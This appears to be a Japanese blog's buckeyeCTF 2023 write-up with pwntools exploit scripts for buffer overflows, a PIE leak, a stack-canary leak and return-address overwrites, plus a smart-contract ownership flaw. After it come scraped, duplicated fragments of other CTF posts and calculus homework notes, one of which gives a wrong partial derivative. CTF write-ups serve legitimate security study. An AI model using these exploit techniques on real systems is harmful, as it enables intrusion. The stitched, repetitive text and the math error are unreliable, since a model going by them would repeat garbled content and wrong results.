コンテスト中にpwn5問とmisc1問をとき、コンテスト後にlosslessとaNyFTを追加で解きました。</p>
[pwn] Beginner Menu</h1>
入力された番号に対してatoi</code>を呼び出します。</p>

1 <= n <= 4 のときは用意された関数を実行しexit</code></li>
5 <= n のときは"Not an Option"と表示しexit</code></li>
そうでない場合はflagを出力</li>
</ul>
という実装がされているので-1を入力するとflagが出てきます。</p>
Flag: bctf{y0u_ARe_sNeaKy}</code></p>
[pwn] Starter Buffer</h1>
自明なStack Buffer Overflowがあります。flag変数の値を書き換えてあげればいいです。</p>
from</span> pwn</span> import *</span></span>
</span>
context.arch</span> =</span> "amd64"</span></span>
context.bits</span> =</span> 64</span></span>
context.terminal</span> =</span> "tmux splitw -h"</span>.split()</span></span>
context.log_level</span> =</span> "DEBUG"</span></span>
</span>
s2sh</span> = lambda</span> pl:</span> b</span>""</span>.join([p8(</span>int</span>(pl[i : i</span> +</span> 2</span>],</span> 16</span>))</span> for</span> i</span> in</span> range</span>(</span>0</span>,</span> len</span>(pl),</span> 2</span>)])</span></span>
s2u64</span> = lambda</span> s: u64(s.ljust(</span>8</span>,</span> b</span>"</span>\x00</span>"</span>))</span></span>
i2b</span> = lambda</span> x:</span> f</span>"</span>{</span>x</span>}</span>"</span>.encode()</span></span>
ptr_guard</span> = lambda</span> pos, ptr: (pos</span> >></span> 12</span>)</span> ^</span> ptr</span></span>
</span>
</span>
def</span> create_io</span>() -> tubes.tube.tube:</span></span>
    if not</span> local:</span></span>
        io: tubes.tube.tube</span> =</span> remote(remote_addr,</span> int</span>(remote_port))</span></span>
    elif</span> debug:</span></span>
        if</span> radare:</span></span>
            io: tubes.tube.tube</span> =</span> process(elf_name,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
            util.proc.wait_for_debugger(util.proc.pidof(io)[</span>0</span>])</span></span>
        else</span>:</span></span>
            io: tubes.tube.tube</span> =</span> gdb.debug(</span></span>
                elf_name, script,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name}</span></span>
            )</span></span>
    else</span>:</span></span>
        io: tubes.tube.tube</span> =</span> process(elf_name,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    return</span> io</span></span>
</span>
</span>
def</span> solve</span>():</span></span>
    global</span> t</span></span>
    sa</span> = lambda</span> x, y: t.sendafter(x, y)</span></span>
    sla</span> = lambda</span> x, y: t.sendlineafter(x, y)</span></span>
</span>
    sla(</span>b</span>": "</span>,</span> b</span>"A"</span> * 0x</span>3C</span> +</span> p32(</span>0x</span>45454545</span>))</span></span>
</span>
    t.interactive()</span></span>
</span>
</span>
local</span> =</span> 0</span></span>
debug</span> =</span> 0</span></span>
radare</span> =</span> 0</span></span>
</span>
elf_name</span> =</span> "./buffer"</span></span>
libc_name</span> =</span> ""</span></span>
remote_addr, remote_port</span> =</span> "chall.pwnoh.io 13372"</span>.split()</span></span>
elf:</span> ELF</span> =</span> ELF(elf_name)</span></span>
# libc: ELF = ELF(libc_name)</span></span>
script</span> =</span> """</span></span>
"""</span></span>
t</span> =</span> create_io()</span></span>
solve()</span></span></code></pre>
Flag:bctf{wHy_WriTe_OveR_mY_V@lUeS}</code></p>
[pwn] Igpay Atinlay Natoriay</h1>
Rustに実行時エラーを起こさせるとフラグがもらえます。</p>
実験している最中に誤ってｆ</code>を入力したらフラグが降ってきました。
落ち着いて考えるとrustはUFT-8として不正な文字列を持てない(はず？)ので、マルチバイト文字を入力するとここでコケます。</p>
    let</span> first</span> = &</span>word[</span>0</span>..</span>1</span>];</span></span></code></pre>
flag:bctf{u$trAy_1SyAy_Af3$ay_aNDy@Y_3cUR3s@y}</code></p>
[pwn] Bugsworld</h1>
VM問です。17個の命令が用意されていますが、実際に実装されているのは11個のみです。</p>
分析</h2>
Bytecodeを与え、盤面の中を自由に動くことができる、というバイナリが渡されます。</p>
セキュリティ機構はすべてonになっています。</p>

Full RELRO</li>
Canary found</li>
NX enabled</li>
PIE enabled</li>
</ul>
脆弱性</h2>
PIE base leak</h3>
win関数が実装されているのでPIE baseのleakさえできればよいです。これはbytecode[i]</code>
に入力された値がサニタイズされる前にprintf</code>が呼び出されていることを利用します。</p>
  for</span> (</span>int</span> i </span>=</span> 0</span>; i </span><</span> n; i</span>++</span>) {</span></span>
    printf</span>(</span>"</span>%s</span>"</span>,</span> instruction_names</span>[</span>bytecode</span>[i]]);</span></span>
    if</span> (</span>bytecode</span>[i]</span> <</span> 0</span> ||</span> bytecode</span>[i]</span> ></span> 16</span>) {</span></span>
      printf</span>(</span>"Invalid instruction</span>\n</span>"</span>);</span></span>
    }</span></span>
    ...</span></span></code></pre>RIPの奪取</h3>
VMは一旦入力を受け取ってそれをサニタイズしたらbytecode[state.pc] != INSTRUCTION_HALT</code>である限り実行を続けます。</p>
INSTRUCTION_HALT</code>は受け取った命令の最後に挿入されます。
すなわちこれを超えることが出来ればその後ろの非サニタイズ済みな命令を実行することができるというわけです。</p>
INSTRUCTION_HALT</code>を超えるために使えそうなパスとしてdont_jump</code>関数があります。
これを我々が呼び出せる最後の命令で実行できればINSTRUCTION_HALT</code>のbypassができそうです。</p>
void</span> dont_jump</span>(State </span>*</span>state</span>) {</span></span>
  state->pc</span>++</span>;</span></span>
  state->pc</span>++</span>;</span></span>
}</span></span></code></pre>
これはdo_jump_if_not_next_is_empty</code>から呼び出すことができます。</p>
void</span> do_jump_if_not_next_is_empty</span>(State </span>*</span>state</span>) {</span></span>
  if</span> (</span>next_is_out_of_bounds</span>(state))</span></span>
    do_jump</span>(state);</span></span>
  else</span></span>
    dont_jump</span>(state);</span></span>
}</span></span></code></pre>攻撃</h2>
呼び出しは以下のコードで行われます。</p>
    instruction_table</span>[</span>bytecode</span>[state.pc]](</span>&</span>state);</span></span></code></pre>
bytecode[state.pc]</code>は任意の値にすることができるので
getFlag</code>
のアドレスをメモリ上のいずれかに置き、
instruction_table</code>
からのオフセットを設定することでRIPが奪取できます。</p>
スクリプト</h2>
from</span> pwn</span> import *</span></span>
</span>
context.arch</span> =</span> "amd64"</span></span>
context.bits</span> =</span> 64</span></span>
context.terminal</span> =</span> "tmux splitw -h"</span>.split()</span></span>
context.log_level</span> =</span> "DEBUG"</span></span>
</span>
s2sh</span> = lambda</span> pl:</span> b</span>""</span>.join([p8(</span>int</span>(pl[i : i</span> +</span> 2</span>],</span> 16</span>))</span> for</span> i</span> in</span> range</span>(</span>0</span>,</span> len</span>(pl),</span> 2</span>)])</span></span>
s2u64</span> = lambda</span> s: u64(s.ljust(</span>8</span>,</span> b</span>"</span>\x00</span>"</span>))</span></span>
i2b</span> = lambda</span> x:</span> f</span>"</span>{</span>x</span>}</span>"</span>.encode()</span></span>
ptr_guard</span> = lambda</span> pos, ptr: (pos</span> >></span> 12</span>)</span> ^</span> ptr</span></span>
</span>
</span>
INSTRUCTION_MOVE</span> =</span> 0</span></span>
INSTRUCTION_TURNLEFT</span> =</span> 1</span></span>
INSTRUCTION_TURNRIGHT</span> =</span> 2</span></span>
INSTRUCTION_INFECT</span> =</span> 3</span></span>
INSTRUCTION_SKIP</span> =</span> 4</span></span>
INSTRUCTION_HALT</span> =</span> 5</span></span>
INSTRUCTION_JUMP</span> =</span> 6</span></span>
INSTRUCTION_JUMP_IF_NOT_NEXT_IS_EMPTY</span> =</span> 7</span></span>
INSTRUCTION_JUMP_IF_NOT_NEXT_IS_NOT_EMPTY</span> =</span> 8</span></span>
INSTRUCTION_JUMP_IF_NOT_NEXT_IS_WALL</span> =</span> 9</span></span>
INSTRUCTION_JUMP_IF_NOT_NEXT_IS_NOT_WALL</span> =</span> 10</span></span>
INSTRUCTION_JUMP_IF_NOT_NEXT_IS_FRIEND</span> =</span> 11</span></span>
INSTRUCTION_JUMP_IF_NOT_NEXT_IS_NOT_FRIEND</span> =</span> 12</span></span>
INSTRUCTION_JUMP_IF_NOT_NEXT_IS_ENEMY</span> =</span> 13</span></span>
INSTRUCTION_JUMP_IF_NOT_NEXT_IS_NOT_ENEMY</span> =</span> 14</span></span>
INSTRUCTION_JUMP_IF_NOT_RANDOM</span> =</span> 15</span></span>
INSTRUCTION_JUMP_IF_NOT_TRUE</span> =</span> 16</span></span>
</span>
</span>
def</span> create_io</span>() -> tubes.tube.tube:</span></span>
    if not</span> local:</span></span>
        io: tubes.tube.tube</span> =</span> remote(remote_addr,</span> int</span>(remote_port))</span></span>
    elif</span> debug:</span></span>
        if</span> radare:</span></span>
            io: tubes.tube.tube</span> =</span> process(elf_name,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
            util.proc.wait_for_debugger(util.proc.pidof(io)[</span>0</span>])</span></span>
        else</span>:</span></span>
            io: tubes.tube.tube</span> =</span> gdb.debug(</span></span>
                elf_name, script,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name}</span></span>
            )</span></span>
    else</span>:</span></span>
        io: tubes.tube.tube</span> =</span> process(elf_name,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    return</span> io</span></span>
</span>
</span>
def</span> solve</span>():</span></span>
    global</span> t</span></span>
    sa</span> = lambda</span> x, y: t.sendafter(x, y)</span></span>
    sla</span> = lambda</span> x, y: t.sendlineafter(x, y)</span></span>
</span>
    sla(</span>b</span>"bytecode?</span>\n</span>> "</span>, i2b(</span>3</span>))</span></span>
    t.sendline(i2b(</span>INSTRUCTION_HALT</span>))</span></span>
    t.sendline(i2b(</span>INSTRUCTION_SKIP</span>))</span></span>
    t.sendline(i2b(</span>255</span>))</span></span>
    buf</span> =</span> t.recvuntil(</span>b</span>"Invalid instruction"</span>)[:</span> -</span>len</span>(</span>"Invalid instruction"</span>)]</span></span>
    buf</span> =</span> buf[buf.find(</span>b</span>"SKIP"</span>)</span> +</span> 5</span> :]</span></span>
    pie_base</span> =</span> s2u64(buf)</span> - 0x</span>134D</span></span>
    success(</span>f</span>"</span>{</span>pie_base</span>=:x</span>}</span>"</span>)</span></span>
    assert not</span> pie_base</span> & 0x</span>FFF</span></span>
</span>
    sla(</span>b</span>"bytecode?</span>\n</span>> "</span>, i2b(</span>4</span>))</span></span>
    t.sendline(i2b(</span>INSTRUCTION_SKIP</span>))</span></span>
    t.sendline(i2b(</span>INSTRUCTION_SKIP</span>))</span></span>
    t.sendline(i2b(</span>0x</span>D8</span> //</span> 8</span>))</span></span>
    t.sendline(i2b(pie_base</span> +</span> elf.sym[</span>"win"</span>]))</span></span>
</span>
    sla(</span>b</span>"bytecode?</span>\n</span>> "</span>, i2b(</span>1</span>))</span></span>
    t.sendline(i2b(</span>INSTRUCTION_JUMP_IF_NOT_NEXT_IS_EMPTY</span>))</span></span>
</span>
    t.interactive()</span></span>
</span>
</span>
local</span> =</span> 0</span></span>
debug</span> =</span> 0</span></span>
radare</span> =</span> 0</span></span>
</span>
elf_name</span> =</span> "./bugsworld"</span></span>
libc_name</span> =</span> "./libc.so.6"</span></span>
# remote_addr, remote_port = "localhost 60001".split()</span></span>
remote_addr, remote_port</span> =</span> "chall.pwnoh.io 13382"</span>.split()</span></span>
elf:</span> ELF</span> =</span> ELF(elf_name)</span></span>
libc:</span> ELF</span> =</span> ELF(libc_name)</span></span>
script</span> =</span> """</span></span>
b *run_program+537</span></span>
"""</span></span>
t</span> =</span> create_io()</span></span>
solve()</span></span></code></pre>
flag:bctf{7h3_w0rld_15_fu11_0f_bu65_295c62b69}</code></p>
[pwn] FUC</h1>
分析</h2>
0x18Fの正方形の盤面上をwasdで自由に動けます。
この盤面の内1つがあたりのマスとなっていて、そこに動くことでフラグを得ることができます。
ただしトラップのマスも用意されており、そのマスを踏むとプログラムが終了してしまうので、どうにかしてそのマスにたどり着くことが出来ればフラグが得られます。</p>
まず、バイナリの確認をします。セキュリティ機構はすべてオンになっています。</p>

Full RELRO</li>
Canary found</li>
NX enabled</li>
PIE enabled</li>
</ul>
脆弱性</h2>
頑張ってリバーシングをします。</p>
その結果、あたりのマスは盤面の四隅にある0x19の正方形内に存在し、最初にスポーンする位置は 0x25 <= x,y <= 0x183</code>
であることがわかりました。
加えて2つの脆弱性を見つけました。</p>

srand(time(0))</li>
移動方向入力時のBoF</li>
</ol>
あたりのマスはrandom</code>関数を使って決定されているため、そのシード値が分かればあたりのマスの位置を知ることができます。
しかしマスの初期化フェーズでは0x10000回以上random</code>関数が呼ばれており、更にその中にはrandom</code>関数の値によってrandom</code>
関数の呼び出し回数が変わるパスもありこの手法は断念しました。</p>
次に移動方向入力時のBoFですが、sub_2F7A</code>においてrbp-0xD</code>に存在する変数に対して0x25byteの入力が行える脆弱性があります。
これを用いてleakとトラップからの復帰を行います。</p>
canary & PIE base leak</h3>
canaryはrbp-0x8</code>に存在しており、その1byte目は\x00なので、無効な文字を7文字入力してあげるとleakすることができます。


    
    canary leak</p></div>
</p>
同様にreturn addressも無効な文字を13文字入力するとleakすることができます。


    
    PIE base leak</p></div>
</p>
トラップからの復帰</h3>
ret overwriteを使ってメニュー画面に飛ぶようにするとトラップからの復帰を行えます。
具体的には以下のようなコードを使いました。</p>
loop_addr</span> =</span> p64(pie_base</span> + 0x</span>2F7A</span>)</span></span>
ret</span> =</span> p64(pie_base</span> + 0x</span>12B8</span>)</span></span>
t.send(dist</span> + b</span>"A"</span> *</span> 4</span> +</span> p64(canary)</span> +</span> fake_rbp</span> +</span> ret</span> +</span> loop_addr)</span></span></code></pre>
以下の画像では、終了メッセージであるit is crushing</code>のあとも実行が続いていることを確認できます。


    
    トラップからの復帰</p></div>
</p>
攻撃</h2>
以下の手順で解きました。</p>

x,yの取得</li>
canary, stack base, pie baseのleak</li>
四隅の内最も近いところまで移動</li>
0x19の正方形をすべて探索</li>
</ol>
注意点として、非本質的なところですがサーバーとの接続は20秒で切れてしまうためrecvuntil</code>
などを用いて逐次的に命令を実行するのではなく、recv</code>でレスポンスをまとめて受け取ると良いです。</p>


    
    必要な値のleak</p></div>
スクリプト</h2>
from</span> pwn</span> import *</span></span>
</span>
context.arch</span> =</span> "amd64"</span></span>
context.bits</span> =</span> 64</span></span>
context.terminal</span> =</span> "tmux splitw -h"</span>.split()</span></span>
context.log_level</span> =</span> "DEBUG"</span></span>
</span>
s2sh</span> = lambda</span> pl:</span> b</span>""</span>.join([p8(</span>int</span>(pl[i : i</span> +</span> 2</span>],</span> 16</span>))</span> for</span> i</span> in</span> range</span>(</span>0</span>,</span> len</span>(pl),</span> 2</span>)])</span></span>
s2u64</span> = lambda</span> s: u64(s.ljust(</span>8</span>,</span> b</span>"</span>\x00</span>"</span>))</span></span>
i2b</span> = lambda</span> x:</span> f</span>"</span>{</span>x</span>}</span>"</span>.encode()</span></span>
ptr_guard</span> = lambda</span> pos, ptr: (pos</span> >></span> 12</span>)</span> ^</span> ptr</span></span>
</span>
</span>
def</span> create_io</span>() -> tubes.tube.tube:</span></span>
    if not</span> local:</span></span>
        io: tubes.tube.tube</span> =</span> remote(remote_addr,</span> int</span>(remote_port))</span></span>
    elif</span> debug:</span></span>
        if</span> radare:</span></span>
            io: tubes.tube.tube</span> =</span> process(elf_name,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
            util.proc.wait_for_debugger(util.proc.pidof(io)[</span>0</span>])</span></span>
        else</span>:</span></span>
            io: tubes.tube.tube</span> =</span> gdb.debug(</span></span>
                [elf_name,</span> "bctf</span>{REDUCTED}</span>"</span>], script,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name}</span></span>
            )</span></span>
    else</span>:</span></span>
        io: tubes.tube.tube</span> =</span> process(</span></span>
            [elf_name,</span> "bctf</span>{REDUCTED}</span>"</span>],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name}</span></span>
        )</span></span>
    return</span> io</span></span>
</span>
</span>
def</span> solve</span>():</span></span>
    global</span> t</span></span>
    sa</span> = lambda</span> x, y: t.sendafter(x, y)</span></span>
    sla</span> = lambda</span> x, y: t.sendlineafter(x, y)</span></span>
</span>
    def</span> safe_move</span>(dist:</span> bytes</span>):</span></span>
        msg</span> =</span> dist</span> + b</span>"A"</span> *</span> 4</span> +</span> p64(canary)</span> +</span> fake_rbp</span> +</span> ret</span> +</span> loop_addr</span></span>
        if b</span>"</span>\x0a</span>"</span> in</span> msg:</span></span>
            raise</span> Exception</span>(</span>"invalid bytes. try again."</span>)</span></span>
        t.send(msg)</span></span>
</span>
    def</span> do_search</span>():</span></span>
        info(</span>f</span>"</span>{</span>x</span>=:x</span>} {</span>y</span>=:x</span>}</span>"</span>)</span></span>
        assert</span> x</span> == 0x</span>18</span> or</span> x</span> == 0x</span>177</span></span>
        assert</span> y</span> == 0x</span>18</span> or</span> y</span> == 0x</span>177</span></span>
</span>
        x_dist</span> = b</span>"a"</span> if</span> x</span> == 0x</span>18</span> else b</span>"d"</span></span>
        y_dist</span> = b</span>"w"</span> if</span> y</span> == 0x</span>18</span> else b</span>"s"</span></span>
        for</span> _</span> in</span> range</span>(</span>0x</span>18</span>):</span></span>
            for</span> _</span> in</span> range</span>(</span>0x</span>18</span>):</span></span>
                safe_move(y_dist)</span></span>
            y_dist</span> = b</span>"w"</span> if</span> y_dist</span> == b</span>"s"</span> else b</span>"s"</span></span>
            safe_move(x_dist)</span></span>
            buf</span> =</span> t.recv()</span></span>
            if b</span>"bctf"</span> in</span> buf:</span></span>
                success(</span>"Flag Found!!"</span>)</span></span>
                input</span>(</span>"..."</span>)</span></span>
        raise</span> Exception</span>(</span>"no flag found here"</span>)</span></span>
</span>
    # leak canary & rbp</span></span>
    sla(</span>b</span>")</span>\n</span>"</span>,</span> b</span>"A"</span> *</span> 6</span>)</span></span>
    buf</span> =</span> t.recvuntil(</span>b</span>"</span>\n</span>("</span>)[:</span>-</span>2</span>]</span></span>
    buf</span> =</span> buf[buf.find(</span>b</span>"AAAAAA"</span>)</span> +</span> 5</span> :]</span></span>
    canary, rbp</span> =</span> buf[:</span>8</span>], buf[</span>8</span>:]</span></span>
    canary</span> =</span> s2u64(canary)</span> & ~0x</span>FF</span></span>
    rbp</span> =</span> s2u64(rbp)</span></span>
    success(</span>f</span>"</span>{</span>canary</span>=:x</span>}</span>"</span>)</span></span>
    success(</span>f</span>"</span>{</span>rbp</span>=:x</span>}</span>"</span>)</span></span>
</span>
    # get X,Y</span></span>
    cur</span> =</span> t.recvuntil(</span>b</span>")"</span>)[:</span>-</span>1</span>]</span></span>
    x, y</span> =</span> list</span>(</span>map</span>(</span>int</span>, cur.split(</span>b</span>", "</span>)))</span></span>
    success(</span>f</span>"</span>{</span>x</span>=</span>} {</span>y</span>=</span>}</span>"</span>)</span></span>
</span>
    # leak pie base</span></span>
    t.sendline(</span>b</span>"A"</span> *</span> 5</span> + b</span>"B"</span> *</span> 8</span> + b</span>"C"</span> *</span> 8</span>)</span></span>
    buf</span> =</span> t.recvuntil(</span>b</span>"</span>\n</span>("</span>)[:</span>-</span>2</span>]</span></span>
    buf</span> =</span> buf[buf.find(</span>b</span>"C"</span> *</span> 8</span>)</span> +</span> 8</span> :]</span></span>
    pie_base</span> =</span> s2u64(buf)</span> - 0x</span>3431</span></span>
    success(</span>f</span>"</span>{</span>pie_base</span>=:x</span>}</span>"</span>)</span></span>
    assert not</span> pie_base</span> & 0x</span>FFF</span></span>
</span>
    fake_rbp</span> =</span> p64(rbp</span> - 0x</span>280</span>)</span></span>
    loop_addr</span> =</span> p64(pie_base</span> + 0x</span>2F7A</span>)</span></span>
    ret</span> =</span> p64(pie_base</span> + 0x</span>12B8</span>)</span></span>
    t.send(</span>b</span>"A"</span> *</span> 5</span> +</span> p64(canary</span> +</span> 2</span>)</span> +</span> fake_rbp</span> +</span> ret</span> +</span> loop_addr)</span></span>
    t.recvuntil(</span>b</span>"Invalid input"</span>)</span></span>
    t.recvline()</span></span>
</span>
    # Go corner</span></span>
    x_dist</span> = b</span>"a"</span> if</span> x</span> < 0x</span>18F</span> -</span> x</span> else b</span>"d"</span></span>
    x_times</span> =</span> min</span>(x</span> - 0x</span>18</span>,</span> 0x</span>177</span> -</span> x)</span></span>
    info(</span>f</span>"</span>{</span>x</span>:x</span>} {</span>'-'</span> if</span> x_dist</span>==b</span>'a'</span> else</span> '+'</span>} {</span>x_times</span>:x</span>}</span>"</span>)</span></span>
</span>
    y_dist</span> = b</span>"w"</span> if</span> y</span> < 0x</span>18F</span> -</span> y</span> else b</span>"s"</span></span>
    y_times</span> =</span> min</span>(y</span> - 0x</span>18</span>,</span> 0x</span>177</span> -</span> y)</span></span>
    info(</span>f</span>"</span>{</span>y</span>:x</span>} {</span>'-'</span> if</span> y_dist</span>==</span>'w'</span> else</span> '+'</span>:</span>} {</span>y_times</span>:x</span>}</span>"</span>)</span></span>
</span>
    for</span> _</span> in</span> range</span>(x_times):</span></span>
        safe_move(x_dist)</span></span>
        x</span> += -</span>1</span> if</span> x_dist</span> == b</span>"a"</span> else</span> 1</span></span>
    for</span> _</span> in</span> range</span>(y_times):</span></span>
        safe_move(y_dist)</span></span>
        y</span> += -</span>1</span> if</span> y_dist</span> == b</span>"w"</span> else</span> 1</span></span>
</span>
    do_search()</span></span>
    t.interactive()</span></span>
</span>
</span>
local</span> =</span> 0</span></span>
debug</span> =</span> 0</span></span>
radare</span> =</span> 0</span></span>
</span>
elf_name</span> =</span> "./maze"</span></span>
libc_name</span> =</span> ""</span></span>
remote_addr, remote_port</span> =</span> "chall.pwnoh.io 13387"</span>.split()</span></span>
elf:</span> ELF</span> =</span> ELF(elf_name)</span></span>
# libc: ELF = ELF(libc_name)</span></span>
script</span> =</span> """</span></span>
"""</span></span>
found</span> =</span> False</span></span>
for</span> _</span> in</span> range</span>(</span>0x</span>300</span>):</span></span>
    if</span> found:</span></span>
        break</span></span>
    t</span> =</span> create_io()</span></span>
    try</span>:</span></span>
        solve()</span></span>
    except</span> Exception</span> as</span> e:</span></span>
        warn(e)</span></span>
        if</span> debug:</span></span>
            input</span>(</span>"debugging..."</span>)</span></span>
    finally</span>:</span></span>
        t.close()</span></span></code></pre>
flag: bctf{YouHavePwndDeath,ToYouGoesAFlag}</code></p>
[misc] New Management</h1>
Blockchain問です。Sepolia TestnetにデプロイされたSmart ContractにFlagを吐かせることが目標です。</p>
脆弱性は自明で、transferOwnership</code>にチェックがついていません。
自分をOwnerにしてbalance[msg.sender]</code>を増やすとFlagを得ることができます。
flag: bctf{wh0_put_y0u_1n_ch4rg3}</code></p>
[pwn] LossLess</h1>
WIP</p>
[misc] aNyFT</h1>
WIP</p>
終わりに</h1>
72時間CTFはいいですね。頭を冷やす時間あって、ゆっくり考えることができました。</p>
唯一の不満はヒープガチャがなかったことですね。寂しかった。</p>


vsctf 2023 | llm-wrapper
2023-09-29T00:00:00+00:00
C++の問題が解きたかったので、vsctf</a>のllm-wrapperを解きました。</p>


About me
2023-09-18T00:00:00+00:00
食べて寝るだけ。</p>

exploit</h2>
`detrust</code>を0x7fffffff</code>にすることでtrust_level</code>を0x80000001</code>にすることができます。あとはこれに2を足す処理を行うとtrust_level</code>が0x7fffffff</code>になりflagが得られます。</p>`

概要</h2>
任意のshellcodeを実行してくれます。</p>

exploit</h2>
https://www.exploit-db.com/exploits/42179 を送るとシェルが降ってきます。</p>

[pwn] og</h1>

脆弱性</h2>
自明なFSBとBoFがあります。</p>

攻撃</h2>
FSBを使ってlibc leakをし、BoFでmainにリターンします。その後、one_gadgetを利用してシェルを取ります。</p>

[pwn] bap</h1>

脆弱性</h2>
ogと同様にFSBとBoFがあります。</p>

攻撃</h2>
FSBを使ってlibc leakをし、BoFでmainにリターンします。その後ROPをします。</p>

[pwn] leftright</h1>

[pwn] heapify</h1>

脆弱性</h2>
ソースコードにもわかりやすく書いてある通り、`gets</code>が使われています。</p>`

[pwn] themectl</h1>

脆弱性</h2>

`[pwn] LossLess</h1> WIP</p> [misc] aNyFT</h1> WIP</p> 終わりに</h1> 72時間CTFはいいですね。頭を冷やす時間あって、ゆっくり考えることができました。</p> 唯一の不満はヒープガチャがなかったことですね。寂しかった。</p>`

[misc] aNyFT</h1>
WIP</p>

終わりに</h1>
72時間CTFはいいですね。頭を冷やす時間あって、ゆっくり考えることができました。</p>
唯一の不満はヒープガチャがなかったことですね。寂しかった。</p>

House-of-Rona

1日目線形代数B

線形代数B</h1>
期末が6/22(月)にあるらしい。</p>

2日目　微分積分B

問題2</h1>

1</h2>
次の関数を偏微分しなさい． $$ f(x,y)=x^3+3ax^2y-4xy^2+2y^3 \quad (a\text{ は定数}) $$</p>
偏微分するときは、片方を固定して考える。</p>
$$ f_x=3x^2+6axy-4xy^2\\ f_y=3ax^2-8xy+6y^2 $$</p>

2</h2>
$$ f(x,y)=e^{2x^2-y} $$</p>
同じくやる。</p>
$$ f_x=4xe^{2x^2-y}\\ f_y=-e^{2x^2-y} $$</p>

問題3</h1>
次の関数の第 2 次偏導関数を求めなさい．</p>

(2)</h2>
$$ f(x,y)=xy\cos(x-y) $$</p>
$xy\cos(x-y)$の微分は積の微分と合成関数の微分を使う必要があるらしくて、積の微分を忘れてた。</p>
$$ (ab)' = a'b + ab' $$ らしいです。答えは省略。</p>

Writeup of DreamHack Invitational 2025

xoronly</h1>
stack上に無限に書き込むことができます。書き込みは既にある値とxorが取られれます。xor後の文字列は`puts</code>されます。</p>`

exploit</h2>

aslr leak</h3>
`__libc_start_main</code>のアドレスをputs(buf)</code>でleakします。</p>`

ainque</h1>
The provided kernel module can load riscv ELF binary and run it in kernel context.</p>

exploit</h2>

DownUnderCTF 2024 | faulty kernel

Angstorm 2024

CakeCTF 2023

buckeyeCTF 2023

vsctf 2023 | llm-wrapper

About me

House-of-Rona

1日目 線形代数B

線形代数B</h1> 期末が6/22(月)にあるらしい。</p>

2日目 微分積分B

問題2</h1>

1</h2> 次の関数を偏微分しなさい． $$ f(x,y)=x^3+3ax^2y-4xy^2+2y^3 \quad (a\text{ は定数}) $$</p> 偏微分するときは、片方を固定して考える。</p> $$ f_x=3x^2+6axy-4xy^2\\ f_y=3ax^2-8xy+6y^2 $$</p>

2</h2> $$ f(x,y)=e^{2x^2-y} $$</p> 同じくやる。</p> $$ f_x=4xe^{2x^2-y}\\ f_y=-e^{2x^2-y} $$</p>

問題3</h1> 次の関数の第 2 次偏導関数を求めなさい．</p>

(2)</h2> $$ f(x,y)=xy\cos(x-y) $$</p> $xy\cos(x-y)$の微分は積の微分と合成関数の微分を使う必要があるらしくて、積の微分を忘れてた。</p> $$ (ab)' = a'b + ab' $$ らしいです。 答えは省略。</p>

Writeup of DreamHack Invitational 2025

xoronly</h1> stack上に無限に書き込むことができます。書き込みは既にある値とxorが取られれます。xor後の文字列はputs</code>されます。</p>

exploit</h2>

aslr leak</h3> __libc_start_main</code>のアドレスをputs(buf)</code>でleakします。</p>

ainque</h1> The provided kernel module can load riscv ELF binary and run it in kernel context.</p>

exploit</h2>

DownUnderCTF 2024 | faulty kernel

Faulty Kernel</h1> 概要</h2> KernelはLinux 6.10.0-rc4で、SMAP,SMEP,kASLRは有効です。</p> mmapとfault handlerがあるmisc deviceを登録するカーネルオブジェクトが渡されます。</p>

概要</h2> KernelはLinux 6.10.0-rc4で、SMAP,SMEP,kASLRは有効です。</p> mmapとfault handlerがあるmisc deviceを登録するカーネルオブジェクトが渡されます。</p>

脆弱性</h2> 脆弱性はdev_vma_fault</code>関数にあります。 この関数は、pagefaultが発生した際にpgoff番目のpageを返す処理を実装していますが、sbuf->pagecount</code>はpagesの個数を表しているためoff-by-oneが発生します。</p>

Angstorm 2024

exploit</h2> detrust</code>を0x7fffffff</code>にすることでtrust_level</code>を0x80000001</code>にすることができます。 あとはこれに2を足す処理を行うとtrust_level</code>が0x7fffffff</code>になりflagが得られます。</p>

概要</h2> 任意のshellcodeを実行してくれます。</p>

exploit</h2> https://www.exploit-db.com/exploits/42179 を送るとシェルが降ってきます。</p>

[pwn] og</h1>

脆弱性</h2> 自明なFSBとBoFがあります。</p>

攻撃</h2> FSBを使ってlibc leakをし、BoFでmainにリターンします。その後、one_gadgetを利用してシェルを取ります。</p>

[pwn] bap</h1>

脆弱性</h2> ogと同様にFSBとBoFがあります。</p>

攻撃</h2> FSBを使ってlibc leakをし、BoFでmainにリターンします。その後ROPをします。</p>

[pwn] leftright</h1>

[pwn] heapify</h1>

脆弱性</h2> ソースコードにもわかりやすく書いてある通り、gets</code>が使われています。</p>

[pwn] themectl</h1>

CakeCTF 2023

buckeyeCTF 2023

脆弱性</h2>

[pwn] LossLess</h1> WIP</p> [misc] aNyFT</h1> WIP</p> 終わりに</h1> 72時間CTFはいいですね。頭を冷やす時間あって、ゆっくり考えることができました。</p> 唯一の不満はヒープガチャがなかったことですね。寂しかった。</p>

[misc] aNyFT</h1> WIP</p>

終わりに</h1> 72時間CTFはいいですね。頭を冷やす時間あって、ゆっくり考えることができました。</p> 唯一の不満はヒープガチャがなかったことですね。寂しかった。</p>

vsctf 2023 | llm-wrapper

About me

1日目線形代数B

線形代数B</h1>
期末が6/22(月)にあるらしい。</p>

2日目　微分積分B

1</h2>
次の関数を偏微分しなさい． $$ f(x,y)=x^3+3ax^2y-4xy^2+2y^3 \quad (a\text{ は定数}) $$</p>
偏微分するときは、片方を固定して考える。</p>
$$ f_x=3x^2+6axy-4xy^2\\ f_y=3ax^2-8xy+6y^2 $$</p>

2</h2>
$$ f(x,y)=e^{2x^2-y} $$</p>
同じくやる。</p>
$$ f_x=4xe^{2x^2-y}\\ f_y=-e^{2x^2-y} $$</p>

問題3</h1>
次の関数の第 2 次偏導関数を求めなさい．</p>

(2)</h2>
$$ f(x,y)=xy\cos(x-y) $$</p>
$xy\cos(x-y)$の微分は積の微分と合成関数の微分を使う必要があるらしくて、積の微分を忘れてた。</p>
